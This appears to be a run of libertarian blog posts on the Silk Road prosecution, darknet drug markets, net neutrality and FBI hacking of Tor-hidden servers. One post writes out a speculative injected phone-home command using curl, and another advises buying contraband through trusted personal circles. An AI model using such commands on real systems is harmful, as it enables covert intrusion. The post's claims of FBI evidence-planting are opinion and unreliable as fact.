No, a myriad of new silk roads will not rise up to replace the old one

The State’s war on Dark Net marketplaces will result in previously trusted marketplaces being replaced by riskier and less trustworthy ones. Honest people operating on a reasonable risk/reward calculation will increasingly abstain from using them. The likely consequence is that the confidence level of DarkNet c-to-b transactions will begin to resemble that of traditional c-to-b transactions, with the additional negative repercussions of being more riskier to the buyer than the traditional c-to-b model.

By now, I’m sure anyone reading this post is aware of the sentence handed down to Ross Ulbricht(aka,”Dread Pirate Roberts”). The purpose of this post is not to extend a commentary on the barbaric character of the sentence.1 That will be for another time. Instead, I want to counter the conventional postscript that concludes virtually every postmortem of the drug war.

“Just another example of an irrational,failed drug war. Take one down, fifteen will rise up to take its place…”

Nope. Not the case. Particularly, in this instance.

First, we should accurately report the full sentence Ulbricht received. It was life imprisonment and a 185 million dollar fine. The State rolled up money laundering charges in the conviction, in no small part because the United States government now “recognizes” bitcoin as a legitimate medium of exchange.2The financial penalty of bitcoin money laundering appears to be the total transactional value that can be pieced together through a forensic analysis of the public blockchain.

Secondly, public court documents and testimony regarding the fed purchases of product from the original silk road marketplace indicate an abnormal level of reliability in a c-to-b(consumer to business, or, if you prefer, user to dealer) drug transaction. Documents indicate you had about a 95% level of confidence that you were actually getting what you thought you were buying. Trust me, that level of confidence is not the norm in traditional c-to-b drug transactions. That’s the real story. The “reduction in violence” argument is not. Frankly, if you made the argument, it is a good indication that your only knowledge of the drug trade comes from watching tv/movies and reading state media sources.

Unfortunately, the effect of barbaric sentencing and draconian money laundering penalties will serve to introduce quite a bit of fraud into Dark Net drug marketplaces. Yes, knock one down, and perhaps fifteen will rise up to take its place. But the level of confidence of a c-to-b transaction confidence will begin to approach the traditional level and indeed may even fall below what you can expect on “the street.” In addition, the confidence level of “dealing with a narc,” on either side of the ledger(consumer or supplier), begins to exceed what you can expect “on the street.” So while there will be replacements, they won’t be exactly the same version as the previous ones.

Frankly, anyone who engages in a repeated pattern of buying or selling on Dark Net sites can only expect to be busted. You may as well just send out an email to the pigs for all intent and purposes. This is opposed to the traditional model where only the dealer following a repeated pattern faces a probable certainty of being prosecuted.

Bitcoin has its uses, but in terms of buying contraband, you are better off sticking to the old-fashioned human p2p network of your reasonably trusted inner/outer circle.

Unfortunately, that conclusion doesn’t exactly make for a “failed war on drugs,” now does it?

1 I’ve read many characterizations that described it as “tragic.” Its not tragic. Its barbaric.

2 Another demonstration why the dipshit “libertarians” at George Mason University campaigning for a “bitcoin regulatory regime” are mortal enemies of libertarianism. The argument that a “regulatory regime” carves out a “legitimate space” in a space that would otherwise be treated wholly as “criminal” actually introduces a far more punitive criminal sanction regime.”Legitimacy” allows the feds to wield the weapon of “money laundering.” And the blockchain is not anonymous. It is only pseudo-anonymous. The crime of operating a website can now carry the financial penalty of any applicable transactional value of the duly recorded transactions in the public blockchain.

Political Science V: Net Neutrality

“All traffic is equal but some is more equal than others”
The Pigs

Heuristically, there is no such thing as “net neutrality”…there hasn’t been since the 1988 Morris Worm. Without heuristic filtering by the tiered network providers, the public internet1 would be practically unusable. It would certainly be unreliable.

The Administrative State implementation of “net neutrality” presages the end of civilian control of the internet, the fossilization of corporate monopoly over the “last mile” and the formalization of a surveillance regime against “unauthorized traffic” (read: IP). The Administrative State enforcement of a “public network” will invite the same censorship that the government imposes over that other decreed thing: “the public airwaves,” even though that thing doesn’t even really exist anymore.

On the one hand, the cognitive dissonance being displayed by so-called civil libertarians is stupendously mind boggling, after all this is the same Administrative State engaged in unnumbered secret activities to undermine an open, free and secure internet in the name of the geopolitical status quo(what it calls “terrorism”). If this was a FCC composed of three republicans instead of two, and they had voted to “save the internet” on a pretense of “we have to implement before you know what is in it,” then the chants would be “bloody murder” instead of self-congratulated “salvation.” Of course every school boy knows the difference between tyranny and liberty is “two republicans instead of three, three democrats instead of two.”

On the other hand, it is not only unsurprising, but predictable. This is the de Jasay method in full effect. States persist because everyone thinks they can use the State for their own ends, but the only result is the persistence of the thing itself, the only demonstration being how state and society interact to disappoint and render each other miserable.

vive le moment libertaire!

1 The “public network,” that small network(small as in the number of hops between any two nodes) where the default condition is pass, is a emergent de facto phenomenon, not a de jure decreed thing.

Political Science IV: Hacked Knowledge Problem

If I was the NSA, I would target the same thing – all the crypto keys. I do the same on pentests, so why not? One target, huge ROI.

Kevin Mitnick

Again, as a reminder, The Hayek Knowledge Problem has been hacked. “The Use of Knowledge in Society” has different implications in 2015 compared to 1945. Economic science, like all sciences, is not written in the staid stone of theological scripture. But live on it will–in the classical liberal turf wars…

Political Science II

The Tor Project has issued a warning that the United States government may soon start seizing core nodes of the Tor Network under the pretext of investigating the “Sony Hack.”1

Of course, Pravda, Inc disseminates the Sony breach as being the handiwork of the North Korean government. LOL. Even if we concede the claim for the sake of argument, there is the conspicuous omission of any argument why bad movies and George Clooney gossip fall under the purview of national security. Then again, the hallmark of a national security state is that “national security” is what the national security state says it is. This, of course, is classic doublethink.

It is worth pointing out that the FBI seizing Tor Direct Authority nodes seems suspiciously consistent with the FBI’s internal objective of an internet wiretap regime by whatever means necessary. Very convenient, but as discussed in the previous “political science” posts, quite predictable. Perhaps the illustrative point here is that political science reducible to “the conspiracy without the conspiracy”2 not only makes for bad church, it also makes for bad Hollywood.

1 Reading is more or less a useless skill if you can’t read between the lines

2 “Conspiracy without the conspiracy” means conspiracy is the rational/scientific pattern…hence no subversion

Political Science

Political science is not moralizing. It is not liturgical recitation from sunday school scripture. Nor is it mere statistical interpolation of voting patterns to predict elections. Predicting elections may be a type of science but there may be a more fundamental science to be had if the outcome repeatedly proves irrelevant to the policies enacted or enforced.

Political science, like all sciences, applies a specific methodology(the scientific method) to explain and predict rational patterns within a specific domain of study. In this case, the specific domain of study is the organization and exercise of political power. There may be some that try to divine a type of justice that animates such an organization of power, but such musings preponderate on the side of prescription(“the ought”) and not description(“the is”). Hence, they are the stuff of political church, not science.

In a previous post,The FBI pwns you, I gave an assessment of an observed phenomenon of state security organs defeating network layer obfuscation. The official explanation claimed only innocuous investigative exploitation of “criminal stupidity.” I, however, offered a competing explanation: the FBI was resorting to application layer exploits to thwart network(IP layer) anonymity. I then advanced a prediction: the FBI and other organs of state security are seeking to bundle application layer exploits under an extended legalized wiretapping regime.

Recently, from Boing Boing FBI secretly seeking legal power to hack any computer, anywhere:

But under the proposed amendment, a judge can issue a warrant that would allow the FBI to hack into any computer, no matter where it is located. The change is designed specifically to help federal investigators carry out surveillance on computers that have been “anonymized” – that is, their location has been hidden using tools such as Tor.

The amendment inserts a clause that would allow a judge to issue warrants to gain “remote access” to computers “located within or outside that district” (emphasis added) in cases in which the “district where the media or information is located has been concealed through technological means”. The expanded powers to stray across district boundaries would apply to any criminal investigation, not just to terrorist cases as at present.

Were the amendment to be granted by the regulatory committee, the FBI would have the green light to unleash its capabilities – known as “network investigative techniques” – on computers across America and beyond. The techniques involve clandestinely installing malicious software, or malware, onto a computer that in turn allows federal agents effectively to control the machine, downloading all its digital contents, switching its camera or microphone on or off, and even taking over other computers in its network

Note, I also offered a corollary to the prediction: the extended wiretapping regime would effectively allow unfalsifiable data laundering from the NSA’s three-hop graphical dragnet. If the “wiretap” failed, the likes of the FBI could make a request up the “corporate intelligence ladder” to the NSA for the mother of all wiretaps: the 3-hop graphical dragnet. The information gleaned from that data could be “reversed-engineered” to fall within the “legal wiretap.” Once the network devices are seized, it is trivial to ex post facto plant a “vulnerability profile” that would “launder” the evidence collection. From a forensics standpoint, it would be difficult to falsify such after-the-fact subterfuge. The only circumvention of this totalitarian “law enforcement technique” would be to have redundant snapshots of the devices in question outside the jurisdiction of any one intervening authority. If the FBI could seize the device but couldn’t get all the redundant snapshots, then a comparative forensic analysis could take place that would expose the subterfuge.

Now, in these two little posts of mine we have seen an actual example of political science. An observed phenomenon: an explanation of the phenomenon, a prediction, a confirmation of the prediction, a prediction corollary that demonstrates the importance of jurisdictional differentiation to stymie the totalitarian pattern of exercised political power.

Of course, for my statement to be a scientific statement, the statement itself has to be subject to falsification. But who is going to falsify it? The political scientists? Let me know when you actually find one…1

1 Death of the Liberal Paradigm

The Rule of Law

Of course, anyone with a modicum of computer science/IT skill knew the the FBI hacked the Silk Road Box at the application layer to obtain its IP layer address. And anyone with a modicum of political science knowledge would have easily been able to predict that these methods–which are in stark violation of the heuristic operability of the internet–would be gerrymandered into permissible legal status. The science of the rule of law is its rational pattern…

FYI

The same reason why property rights generally do not apply in the digital realm is the same reason why any discussion of “social justice” within the same is ludicrous. Where there is no scarcity, there is no injustice…

The FBI Pwns You

A few hours ago Wired published details of the FBI’s rebuttal to the previously filed Ross Ulbricht defense motion that proffered the State’s case necessarily rested on evidence obtained from illegal searches(read: NSA dragnetting). The gist:

In the latest filing, however, former FBI agent Christopher Tarbell counters Ulbricht’s defense by describing just how he and another FBI agent located the Silk Road server in June of last year without any sophisticated intrusion: Instead, he says, they found a misconfiguration in an element of the Silk Road login page, which revealed its internet protocol (IP) address and thus its physical location.

As they typed “miscellaneous” strings of characters into the login page’s entry fields, Tarbell writes that they noticed an IP address associated with some data returned by the site didn’t match any known Tor “nodes,” the computers that bounce information through Tor’s anonymity network to obscure its true source. And when they entered that IP address directly into a browser, the Silk Road’s CAPTCHA prompt appeared, the garbled-letter image designed to prevent spam bots from entering the site.

The actual technical claim: Arbitrary HTTP Posts to the login form action leaked the Server’s Internet Protocol Address in the Response Headers and/or data payload.

Probability of said claim: Assuming Ulbricht(and the chain of ownership that preceded him) not to be idiots of the first order, ~0. The only likely “misconfiguration” would be the typical default configuration, which is to “leak” the web server and OS type/version in the response headers.

If we assume the FBI letter to be a half-truth, which frankly is not necessarily a reasonable presumption to make(as opposed to, say, the outright lie), we can ascertain a more accurate technical translation:

We sent a malicious string in the request body of a login submission to inject an executable code payload, $ curl http://laundry.forensics.fbi.gov, which essentially allowed to us to perform a remote drive-by phone home on the target.

Now, if we assume the half-truthiness of the FBI in this matter, we can thusly deduce a methodology of counter-attack by US intel organs against network obfuscation techniques–namely directly attacking the target at the application layer. In other words, the use of buffer overflow exploits(maybe zero-day or not) on the target itself to perform drive-by phone homes, or in a more sophisticated attack, to install a wiretap implementation.

Going forward, one has to assume that the use of “cyber-hacking” as means to facilitate a court-approved wiretap will be deemed legal in much the same way breaking into your property to install the old-fashioned wiretaps was deemed legally proper. Of course, I would be remiss not to point out that the legal sanctification of State hacking by organs of the justice department provides a very convenient laundromat for laundering the legality of any data collected by the 3-hop graphical dragnet(read: NSA).

Finally, it should be noted that it’s not surprising the State would eventually seize on this vector of attack. Since 1988(the infamous morris worm), it is been well-known that the weakness of the internet was not in the layered protocol design itself but in the client-server software implementation of the protocol standards. In particular, the c and c++ languages are susceptible to memory violations in string operations against arbitrary data length, resulting in access violations that can produce malicious results if the violating data is carefully formatted to do exactly that. In a sense, it is enough a problem that it could have killed the internet from the start if not for a sort of spontaneous, heuristic security best practices regime that arose that limited the problem of rogue actors to a tolerable one.

But if the heuristic law saved the internet, it is the “rule of law” that will surely kill it(in terms of being a utopian instrument). For it is the latter which turns software vulnerabilities into a primary means of both wiretapping targets and laundering graphical dragnets, reminding us, once again, that the State is indeed its own agency and its preservation best executed by a type of competitive agency of invasion of the body snatchers.